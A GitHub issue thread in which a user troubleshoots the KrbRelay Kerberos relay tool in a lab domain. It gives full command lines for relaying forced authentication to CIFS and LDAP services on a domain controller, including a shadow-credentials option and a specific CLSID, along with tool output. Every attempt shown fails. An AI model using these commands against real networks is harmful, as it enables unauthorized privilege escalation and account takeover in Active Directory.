Invalid apReq

Question

Invalid apReq

mgp25 opened this issue 2 years ago · comments

Hello, I was getting the message Recieved invalid apReq, exploit will fail and read issue (#1) where you suggested to check environment and parameters. Could you point what should we look at?

Info and steps to reproduce

DC01: Windows Server 2019
PC01: Windows 10
Attacker PC: Windows 10

A user is logged on PC01 (session checked query session):

PS > query session
 NOMBRE DE SESIÓN  NOMBRE DE USUARIO        ID  ESTADO    TIPO   DISPOSITIVO
 services                                    0  Desc
>console           user1                  1  Activo

Here is the log:

PS C:\Users\attacker\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: DESKTOP-GJKLN17\attacker
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\attacker\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACgd0eTYtluhPpC9CsKnCTbAgQAAKAQ//+ktx2fV11FtiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 1
[-] Recieved invalid apReq, exploit will fail
05000b0710000000e800400002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e209000900370000000f000f00280000000a00614a0000000f4445534b544f502d474a384b4d3437574f524b47524f5550

Hope I am not missing anything

Thanks!

cube0x0 · Answer 1 · Sat May 28 2022 02:00:02 GMT+0800 (China Standard Time)

attacker is a non-domain context

mgp25 · Answer 2 · Sun May 29 2022 06:36:20 GMT+0800 (China Standard Time)

Hello @cube0x0, thanks for your fast response!

I tried it within a domain context too but it failed :/

PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: LAB\usuario1
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC+r/qOx2Z1B+pLzMg2PGlZAuwAAGwb//9Nj4c5NmmdUiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 2
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142

Another attempt:

PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn ldap/dc01.lab.local -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
[*] Relaying context: lab.local\PC01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC9YZtQo5H86MSpLrTJ2iK+AjQAAMQB//8h5G+ahu59CCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142